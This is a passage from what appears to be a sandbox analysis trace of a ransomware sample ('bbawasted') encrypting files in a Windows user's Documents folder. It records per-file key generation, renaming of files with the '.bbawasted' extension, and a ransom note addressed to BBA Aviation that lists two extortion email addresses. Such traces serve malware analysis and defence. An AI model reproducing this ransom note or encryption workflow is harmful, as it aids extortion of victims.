KEY:\r\n[begin_key]et3vRKysVl3Ce2YUFEjGCXn7VHM9c/NCvN/8dLwXav3ePF3pWs4Jb2Qi0p44Nf4B\r\nfqA+qimz5CXo+B07pIAKEb4vfRx01ib1pAak4cHXnPIg8eMrd9Kf0tx8EtvB7I0I\r\ntdq0lvaiRvgPQbpnzM3aFK2gDnu/wATCsTOO1RzapVE/RJAvxy7MXSfOvMME7ZFc\r\n4ewHkUxH/taWGl4u6aDKVPtcEkySI0642edI7tdeluuVMZqkxfWaCBZHaqUkpX0q\r\nNtZMJTNRcrDpScgj27zYW2a8ryaJDHZIVT0sR5Y0DdLlvXy8SQ2qzwtHkIOBACyz\r\nq4xHlZg0/ZRgkSD/+SXkgad9VAJkGYdqbw+OHI5td/3Z6qBx0+0M9IaYl2NJpDrA\r\nyAzjXlfnOXmK4zbjyH1Bt/k8mRL79YyH/Z7anR2C5GASBTArAjFr5TNQDeaXmYE7\r\nCfQl0wE2384l+dAb0/Qwf9lXv+DgxFsORhNmrWxlCjoZH+2vyEALmXYSLjTYP0Te\r\nal91Q+t97+cEXakOQh/APDYurdaAczQUAwnl09MpRwytelmbE/qGp8/r6v3W/89t\r\nJOJ15bMrby1W+ioEPpsDqXOxOaXQ2s4ZJAjUb7Tyycs6BT+jkxdX406efKQBWOK8\r\ngMPp798MUYhXfWFIaLe6jHRdk8Rzjnn8+bVL5l/Wo8z=[end_key]\r\nKEEP IT\r\n") returned 984 [0218.787] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0218.787] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0218.788] SetEndOfFile (hFile=0x28c) returned 1 [0218.938] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0218.938] CloseHandle (hObject=0x28c) returned 1 [0218.938] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0218.938] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a46c8 | out: hHeap=0x660000) returned 1 [0218.939] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6020) returned 1 [0218.939] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0218.939] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0218.939] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\VWu9qKSp4awpn2vvg1y.doc") returned 53 [0218.939] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x274) returned 0x6aecf0 [0218.940] lstrcpyW (in: lpString1=0x6aed5a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0218.940] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0218.940] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a60a8) returned 1 [0218.940] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0218.940] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0218.940] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\VWu9qKSp4awpn2vvg1y.doc.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\vwu9qksp4awpn2vvg1y.doc.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0218.942] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0218.943] SetEndOfFile (hFile=0x28c) returned 1 [0218.943] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0218.943] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0218.944] lstrcpyW (in: lpString1=0x6aed5a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0218.944] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\VWu9qKSp4awpn2vvg1y.doc" (normalized: "c:\\users\\fd1hvy\\documents\\vwu9qksp4awpn2vvg1y.doc"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\VWu9qKSp4awpn2vvg1y.doc.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\vwu9qksp4awpn2vvg1y.doc.bbawasted")) returned 1 [0218.945] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\VWu9qKSp4awpn2vvg1y.doc.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\vwu9qksp4awpn2vvg1y.doc.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0218.945] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0218.945] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x58bf [0218.945] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x58bf) returned 0x5f0000 [0218.945] CloseHandle (hObject=0x294) returned 1 [0218.946] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0218.947] CloseHandle (hObject=0x27c) returned 1 [0218.947] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0218.947] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6350) returned 1 [0218.948] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0218.948] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0218.948] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6240) returned 1 [0218.949] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0218.949] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0218.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0218.961] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0218.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0218.961] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]eQvoQGDTTMmdasrkh1hTiHZhYE3inZedeFABdPkyVWfJjrn3INrKg255Dbth1Y9X\r\nLTvwbmMVKIeifpJfgIl9wWHf9UL0MjQH8XJ0L7RfOUTu7qVs8746aNpuakcsESk2\r\nxO1j4SvYRTl/p05Tf3eyzeB+EbvgNxuuovumvCJjdKf0hwXouVzP2IHaSno2R4/y\r\nSpoueH5Q4e8408ntulZ6FQ2imLqLyVyzmyRb2hdsPZWAQfC9sEi8mIepjfGEUQ1B\r\nyGAZ2cirDB92FRSGhQ2j9SW3aiVt8Tz0wtiwTfG+N7o3cBuiNW3puMzBJYjE4CKF\r\nfolz2sftd4Zp7frOYTWIXaHmWcKswT7cCuSJldq89HdFyUqCvFJXIQmmyrw2KJ7Y\r\npzYKsZWpASD6+DppXqcD0Q74Yd75omVnG6x2RzUtsvVkHQ2QzDFEcLsRwt6CZLvn\r\nP4bp0+ECZyQpqNYi8DEr2XLvINw6QVFdwDetJEs1UJOOo2wpuounvNR1kt6izgze\r\nZ1OCTR5phAjtg7PNLxn15obpMVmjpLa6lzvCXbnQOsUr6HCB1Wo3NMnG/d3sYUdF\r\n+/nFPN3BLFxBo7ylrRT86nx9sm/ikR8haeLK5ZlpLv6C8weXg2swGwcem/r9tAf/\r\niMc7u2jcZQxcSK1oX7komBVlL/MQZP5/S0dNWMuDdtu=[end_key]\r\nKEEP IT\r\n") returned 984 [0218.961] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0218.961] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0218.961] SetEndOfFile (hFile=0x28c) returned 1 [0218.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0218.964] CloseHandle (hObject=0x28c) returned 1 [0218.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0218.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b7b80 | out: hHeap=0x660000) returned 1 [0218.965] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6240) returned 1 [0218.966] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0218.966] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0218.966] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\xZd6T_OYhB.xlsx") returned 45 [0218.966] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x264) returned 0x6adb18 [0218.966] lstrcpyW (in: lpString1=0x6adb72, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0218.966] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0218.966] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a65f8) returned 1 [0218.967] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0218.967] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0218.967] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\xZd6T_OYhB.xlsx.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\xzd6t_oyhb.xlsx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0218.968] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0218.969] SetEndOfFile (hFile=0x28c) returned 1 [0218.969] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0218.970] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0218.970] lstrcpyW (in: lpString1=0x6adb72, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0218.970] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\xZd6T_OYhB.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\xzd6t_oyhb.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\xZd6T_OYhB.xlsx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\xzd6t_oyhb.xlsx.bbawasted")) returned 1 [0218.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\xZd6T_OYhB.xlsx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\xzd6t_oyhb.xlsx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0218.971] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0218.971] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x14395 [0218.971] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14395) returned 0x5f0000 [0218.971] CloseHandle (hObject=0x27c) returned 1 [0218.974] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0218.976] CloseHandle (hObject=0x294) returned 1 [0218.976] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0218.976] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a65f8) returned 1 [0218.976] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0218.976] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0218.977] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a62c8) returned 1 [0218.977] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0218.977] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0219.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0219.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0219.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0219.348] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ntYTMWGZBdHv/WJsyVV9m9/cDTSUOV2UWxCAvZsvzqCSB3IWpzwon87pBtgxOKTF\r\nfmWEy2q4zRc9ZvmvEpyxl3WDuQ5JlXGxOnjCYRuApKclS/8sMTLWdPdsvCKab+BI\r\nWl+fdU+sdt7nve0ud4MWTbMmb230IT4Vj+PjBS3ap1q/fslp1AEAq+Bvtqw5h+H0\r\ny9aZuvZ3GE2b4pbp3FCIe1+0kRfLNO1NNojnjzbOTqabnjxAi6aGofRvb6mAaDOy\r\nIM1xi66SXiVb4290mBua9snypj4Dn50KIV17r+TYj4IWWZUHZWp7N9oLrm6/XGau\r\nfSOMcZY+LUsLQ0g5iwD/6sJOqMBEV99/UQChJodXtCvXyS21LvRGwobPx3OpM7Ev\r\nPUTjq4pcvNPbjDzGMCtKdX77RCA1+BTP4mkEvNn3JfKmloFDSMO5UrfqdRoPG7yJ\r\nCZVbrYOMDbykmXqRCbG2SwweqAP+9bhfeKnmz4ylovlnHfkACBIw90UekAw4541r\r\nSpWniJTifHPIlPS6bSnXm3X7jLBBBwt7Yr9rQLK2hQalmryYn4lLRxPFjAahVLB2\r\nyV3NVCsk8y/wzH/4TbHukNHY/MjKUBTyTBu2AQOU2pJ3c3rQRjb0Pmta7mfTfWCs\r\nvwwAvhufTiM1BXeG0fGXWDCIgqvVKs2o9LNm4pI3AfI=[end_key]\r\nKEEP IT\r\n") returned 984 [0219.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0219.348] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0219.349] SetEndOfFile (hFile=0x28c) returned 1 [0219.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0219.352] CloseHandle (hObject=0x28c) returned 1 [0219.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0219.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6af530 | out: hHeap=0x660000) returned 1 [0219.352] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6680) returned 1 [0219.353] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0219.353] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0219.353] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\z4Q5Y80fY6bJ4quju1s.xlsx") returned 54 [0219.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x276) returned 0x6aecf0 [0219.353] lstrcpyW (in: lpString1=0x6aed5c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0219.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0219.354] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a5f10) returned 1 [0219.354] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0219.354] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0219.354] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\z4Q5Y80fY6bJ4quju1s.xlsx.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\z4q5y80fy6bj4quju1s.xlsx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0219.362] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0219.364] SetEndOfFile (hFile=0x28c) returned 1 [0219.364] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0219.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0219.364] lstrcpyW (in: lpString1=0x6aed5c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0219.364] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\z4Q5Y80fY6bJ4quju1s.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\z4q5y80fy6bj4quju1s.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\z4Q5Y80fY6bJ4quju1s.xlsx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\z4q5y80fy6bj4quju1s.xlsx.bbawasted")) returned 1 [0219.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\z4Q5Y80fY6bJ4quju1s.xlsx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\z4q5y80fy6bj4quju1s.xlsx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0219.366] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0219.366] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x13b14 [0219.366] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13b14) returned 0x610000 [0219.366] CloseHandle (hObject=0x27c) returned 1 [0219.369] UnmapViewOfFile (lpBaseAddress=0x610000) returned 1 [0219.370] CloseHandle (hObject=0x290) returned 1 [0219.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0219.370] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6c58) returned 1 [0219.371] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0219.371] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0219.371] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a60a8) returned 1 [0219.372] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0219.372] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0219.384] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0219.385] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0219.385] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0219.385] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]EqadbqadTUrbgdvzG8ykqMybL4jrm3ZGJ27h3lM3WsyOq9/TWE/PtYyXUQb2jQLY\r\ng4X8YyD/roX5FfwlZsv41yNRJfvX5cMtInypMOMbCsTuR6VPyWTfz/vT/kc8/jZy\r\ntq1lTwFflzHhXxDTlgLSocFxktNSwZZ7+3HIwoggCSu0grrUs/eE5c+ZGHV8WuRB\r\n0ByPzhKpyo6b1tCh9tAEqgvYwIONLvCefdbsm1Tx4el5n7yqG/wLXS6NY66Ev3Zm\r\ndTp3AbcgLzzoCMGfscmHOMe/BF+xJ20HMvctTY+Y0PBxb4c3WzFVVQMDie5XExlS\r\neyRofhhlcaWCIP/+MX7GSOqbEsVZWg65MyUi7kWcrRetIym2oKdSTveLTNkJy1bR\r\nLf8hoPfh7hf3FBZlZ56GBF2NLG1KVqsJXNZKZfNT3jmCQAA8N5yUy3A3KhRetUdA\r\ndnpOrfIvkdoz2y33SrIU5jTfLwvH8VXY/RT8D7TKWU+VU0rjtW4INEoVoPvewj8B\r\nC2WnoqE4Z7orCpFcprzYtq+CQqNkDnixIv0bD9Y6EWpmEE0w/KwOi8EE2uZ73hta\r\nAai1roclktyIbJTqe9GNkmRyqyyNYlV5nsa2Ku8aanSD9jgTFHClkIY/nUxlal7p\r\nXel7EUWHyqP+RvuhO4g0kPqvBg0Y17/jndVB+NNf+6h=[end_key]\r\nKEEP IT\r\n") returned 984 [0219.385] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0219.385] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0219.385] SetEndOfFile (hFile=0x28c) returned 1 [0219.388] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0219.388] CloseHandle (hObject=0x28c) returned 1 [0219.388] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0219.388] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b7860 | out: hHeap=0x660000) returned 1 [0219.388] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a69b0) returned 1 [0219.608] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0219.608] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0219.609] lstrlenW 